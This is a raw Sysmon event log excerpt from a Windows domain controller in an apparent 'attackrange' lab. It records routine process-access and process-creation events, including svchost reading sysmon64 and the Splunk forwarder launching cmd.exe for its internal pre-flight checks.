08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16B3-5F84-4700-000000007F01}40922604C:\Windows\system32\cmd.exe{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.696{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5D479F2C-16B3-5F84-4700-000000007F01}4092C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4700-000000007F01}4092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4700-000000007F01}4092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B3-5F84-4700-000000007F01}4092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.691{5D479F2C-16B3-5F84-4700-000000007F01}4092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.636{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.605{5D479F2C-16B3-5F84-4600-000000007F01}40604064C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 